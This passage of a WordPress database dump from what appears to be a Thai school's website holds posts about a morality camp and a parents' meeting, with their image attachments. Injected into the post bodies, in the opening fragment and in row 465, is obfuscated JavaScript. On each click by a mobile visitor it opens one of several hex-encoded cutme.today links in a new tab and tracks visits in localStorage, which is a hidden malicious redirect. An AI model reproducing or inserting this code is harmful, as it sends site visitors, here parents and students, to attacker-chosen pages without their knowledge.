_0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','เมื่อวันศุกร์ที่ 20 กันยายน 2567 โรงเรียนอนุบาลวัดพระโตได้จัดกิจกรรม การประชุมเชิงปฏิบัติการ \"ค่ายพัฒนาจริยคุณ ตามแนวทางโรงเรียนคุณธรรม สพฐ.\" ภายใต้โครงการพัฒนาคุณธรรม จริยธรรม ณ หอประชุมโรงเรียนอนุบาลวัดพระโต โดยมีนางวิชุดา ชัยชาญ ผู้อำนวยการโรงเรียนตะดอบวิทยา คณะครูและนักเรียนโรงเรียนตะดอบวิทยา เป็นวิทยากร คณะผู้บริหาร ครูและบุคลากรทางการศึกษา แกนนำนักเรียน และสภานักเรียนโรงเรียนอนุบาลวัดพระโตได้เข้าร่วมกิจกรรมอย่างพร้อมเพรียง','','publish','closed','closed','','%e0%b9%80%e0%b8%a1%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%a8%e0%b8%b8%e0%b8%81%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-20-%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%a2%e0%b8%b2-2','','','2024-12-12 10:35:24','2024-12-12 03:35:24','',0,'http://watprato.ssk.in.th/?p=463',0,'post','',0),
(464,2,'2024-10-01 14:00:20','2024-10-01 07:00:20','','461609374_122180697116202781_2314377563164186579_n','','inherit','open','closed','','461609374_122180697116202781_2314377563164186579_n-2','','','2024-10-01 14:00:20','2024-10-01 07:00:20','',463,'http://watprato.ssk.in.th/wp-content/uploads/2024/10/461609374_122180697116202781_2314377563164186579_n-1.jpg',0,'attachment','image/jpeg',0),
(465,2,'2024-10-01 14:00:40','2024-10-01 07:00:40','<!-- wp:image {\"id\":464,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/10/461609374_122180697116202781_2314377563164186579_n-1-724x1024.jpg\" alt=\"\" class=\"wp-image-464\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','เมื่อวันศุกร์ที่ 20 กันยายน 2567 โรงเรียนอนุบาลวัดพระโตได้จัดกิจกรรม การประชุมเชิงปฏิบัติการ \"ค่ายพัฒนาจริยคุณ ตามแนวทางโรงเรียนคุณธรรม สพฐ.\" ภายใต้โครงการพัฒนาคุณธรรม จริยธรรม ณ หอประชุมโรงเรียนอนุบาลวัดพระโต โดยมีนางวิชุดา ชัยชาญ ผู้อำนวยการโรงเรียนตะดอบวิทยา คณะครูและนักเรียนโรงเรียนตะดอบวิทยา เป็นวิทยากร คณะผู้บริหาร ครูและบุคลากรทางการศึกษา แกนนำนักเรียน และสภานักเรียนโรงเรียนอนุบาลวัดพระโตได้เข้าร่วมกิจกรรมอย่างพร้อมเพรียง','','inherit','closed','closed','','463-revision-v1','','','2024-10-01 14:00:40','2024-10-01 07:00:40','',463,'http://watprato.ssk.in.th/?p=465',0,'revision','',0),
(469,1,'2025-06-06 13:27:32','2025-06-06 06:27:32','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":470,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499660042_122228241086202781_2318108421499316578_n-724x1024.jpg\" alt=\"\" class=\"wp-image-470\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:image {\"id\":477,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499373748_122228242052202781_7736484197867167976_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-477\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":478,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499017402_122228241992202781_5777500599788972527_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-478\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":480,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499708540_122228242064202781_3633598253689018762_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-480\"/></figure>\n<!-- /wp:image -->','เมื่อวันที่ 18 พฤษภาคม 2568 เวลา 09.00-12.00 น. โรงเรียนอนุบาลวัดพระโต นำโดย นายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ รองผู้อำนวยการ พร้อมด้วยคณะครูและบุคลากรทางการศึกษา ได้ดำเนินการประชุมผู้ปกครองนักเรียน ระดับชั้นมัธยมศึกษาปีที่ 1-3 ภาคเรียนที่ 1 ประจำปีการศึกษา 2568 เพื่อร่วมกันพัฒนาการจัดการศึกษา คัดเลือกคณะกรรมการเครือข่ายผู้ปกครอง พร้อมทั้งมีการมอบเงินค่าเครื่องแบบนักเรียนและค่าอุปกรณ์การเรียน ตามโครงการสนับสนุนค่าใช้จ่ายในการจัดการศึกษา เรียนฟรี 15 ปี','','publish','open','open','','%e0%b8%a1%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%b5%e0%b9%88-18-%e0%b8%9e%e0%b8%a4%e0%b8%a9%e0%b8%a0%e0%b8%b2%e0%b8%84%e0%b8%a1-2568-%e0%b9%80%e0%b8%a7%e0%b8%a5%e0%b8%b2','','','2025-06-06 13:34:56','2025-06-06 06:34:56','',0,'http://watprato.ssk.in.th/?p=469',0,'post','',0),
(470,1,'2025-06-06 13:24:27','2025-06-06 06:24:27','','499660042_122228241086202781_2318108421499316578_n','','inherit','open','closed','','499660042_122228241086202781_2318108421499316578_n','','','2025-06-06 13:24:27','2025-06-06 06:24:27','',469,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/499660042_122228241086202781_2318108421499316578_n.jpg',0,'attachment','image/jpeg',0),
(471,1,'2025-06-06 13:24:49','2025-06-06 06:24:49','','499373748_122228242052202781_7736484197867167976_n','','inherit','open','closed','','499373748_122228242052202781_7736484197867167976_n','','','2025-06-06 13:24:49','2025-06-06 06:24:49','',469,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/499373748_122228242052202781_7736484197867167976_n.jpg',0,'attachment','image/jpeg',0),
(472,1,'2025-06-06 13:25:22','2025-06-06 06:25:22','','499017402_122228241992202781_5777500599788972527_n','','inherit','open','closed','','499017402_122228241992202781_5777500599788972527_n','','','2025-06-06 13:25:22','2025-06-06 06:25:22','',469,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/499017402_122228241992202781_5777500599788972527_n.jpg',0,'attachment','image/jpeg',0),
(473,1,'2025-06-06 13:25:46','2025-06-06 06:25:46','','499708540_122228242064202781_3633598253689018762_n','','inherit','open','closed','','499708540_122228242064202781_3633598253689018762_n','','','2025-06-06 13:25:46','2025-06-06 06:25:46','',469,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/499708540_122228242064202781_3633598253689018762_n.jpg',0,'attachment','image/jpeg',0),
(474,1,'2025-06-06 13:25:56','2025-06-06 06:25:56','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":470,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499660042_122228241086202781_2318108421499316578_n-724x1024.jpg\" alt=\"\" class=\"wp-image-470\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":471,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499373748_122228242052202781_7736484197867167976_n-1024x726.jpg\" alt=\"\" class=\"wp-image-471\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:image {\"id\":472,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499017402_122228241992202781_5777500599788972527_n-1024x726.jpg\" alt=\"\" class=\"wp-image-472\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":473,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499708540_122228242064202781_3633598253689018762_n-1024x726.jpg\" alt=\"\" class=\"wp-image-473\"/></figure>\n<!-- /wp:image -->','มื่อวันที่ 18 พฤษภาคม 2568 เวลา 09.00-12.00 น. โรงเรียนอนุบาลวัดพระโต นำโดย นายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ รองผู้อำนวยการ พร้อมด้วยคณะครูและบุคลากรทางการศึกษา ได้ดำเนินการประชุมผู้ปกครองนักเรียน ระดับชั้นมัธยมศึกษาปีที่ 1-3 ภาคเรียนที่ 1 ประจำปีการศึกษา 2568 เพื่อร่วมกันพัฒนาการจัดการศึกษา คัดเลือกคณะกรรมการเครือข่ายผู้ปกครอง พร้อมทั้งมีการมอบเงินค่าเครื่องแบบนักเรียนและค่าอุปกรณ์การเรียน ตามโครงการสนับสนุนค่าใช้จ่ายในการจัดการศึกษา เรียนฟรี 15 ปี','','inherit','closed','closed','','469-revision-v1','','','2025-06-06 13:25:56','2025-06-06 06:25:56','',469,'http://watprato.ssk.in.th/?p=474',0,'revision','',0),
(476,1,'2025-06-06 13:32:53','2025-06-06 06:32:53','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":470,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499660042_122228241086202781_2318108421499316578_n-724x1024.jpg\" alt=\"\" class=\"wp-image-470\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:image {\"id\":472,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499017402_122228241992202781_5777500599788972527_n-1024x726.jpg\" alt=\"\" class=\"wp-image-472\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":473,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499708540_122228242064202781_3633598253689018762_n-1024x726.jpg\" alt=\"\" class=\"wp-image-473\"/></figure>\n<!-- /wp:image -->','มื่อวันที่ 18 พฤษภาคม 2568 เวลา 09.00-12.00 น. โรงเรียนอนุบาลวัดพระโต นำโดย นายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ รองผู้อำนวยการ พร้อมด้วยคณะครูและบุคลากรทางการศึกษา ได้ดำเนินการประชุมผู้ปกครองนักเรียน ระดับชั้นมัธยมศึกษาปีที่ 1-3 ภาคเรียนที่ 1 ประจำปีการศึกษา 2568 เพื่อร่วมกันพัฒนาการจัดการศึกษา คัดเลือกคณะกรรมการเครือข่ายผู้ปกครอง พร้อมทั้งมีการมอบเงินค่าเครื่องแบบนักเรียนและค่าอุปกรณ์การเรียน ตามโครงการสนับสนุนค่าใช้จ่ายในการจัดการศึกษา เรียนฟรี 15 ปี','','inherit','closed','closed','','469-revision-v1','','','2025-06-06 13:32:53','2025-06-06 06:32:53','',469,'http://watprato.ssk.in.th/?p=476',0,'revision','',0),
(477,1,'2025-06-06 13:34:28','2025-06-06 06:34:28','','499373748_122228242052202781_7736484197867167976_n','','inherit','open','closed','','499373748_122228242052202781_7736484197867167976_n-2','','','2025-06-06 13:34:28','2025-06-06 06:34:28','',469,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/499373748_122228242052202781_7736484197867167976_n-1.jpg',0,'attachment','image/jpeg',0),
(478,1,'2025-06-06 13:34:37','2025-06-06 06:34:37','','499017402_122228241992202781_5777500599788972527_n','','inherit','open','closed','','499017402_122228241992202781_5777500599788972527_n-2','','','2025-06-06 13:34:37','2025-06-06 06:34:37','',469,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/499017402_122228241992202781_5777500599788972527_n-1.jpg',0,'attachment','image/jpeg',0),
(480,1,'2025-06-06 13:34:48','2025-06-06 06:34:48','','499708540_122228242064202781_3633598253689018762_n','','inherit','open','closed','','499708540_122228242064202781_3633598253689018762_n-2','','','2025-06-06 13:34:48','2025-06-06 06:34:48','',469,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/499708540_122228242064202781_3633598253689018762_n-1.jpg',0,'attachment','image/jpeg',0),
(481,1,'2025-06-06 13:34:53','2025-06-06 06:34:53','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":470,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499660042_122228241086202781_2318108421499316578_n-724x1024.jpg\" alt=\"\" class=\"wp-image-470\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:image {\"id\":477,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499373748_122228242052202781_7736484197867167976_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-477\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":478,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499017402_122228241992202781_5777500599788972527_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-478\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":480,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/499708540_122228242064202781_3633598253689018762_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-480\"/></figure>\n<!-- /wp:image -->','เมื่อวันที่ 18 พฤษภาคม 2568 เวลา 09.00-12.00 น. โรงเรียนอนุบาลวัดพระโต นำโดย นายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ รองผู้อำนวยการ พร้อมด้วยคณะครูและบุคลากรทางการศึกษา ได้ดำเนินการประชุมผู้ปกครองนักเรียน ระดับชั้นมัธยมศึกษาปีที่ 1-3 ภาคเรียนที่ 1 ประจำปีการศึกษา 2568 เพื่อร่วมกันพัฒนาการจัดการศึกษา คัดเลือกคณะกรรมการเครือข่ายผู้ปกครอง 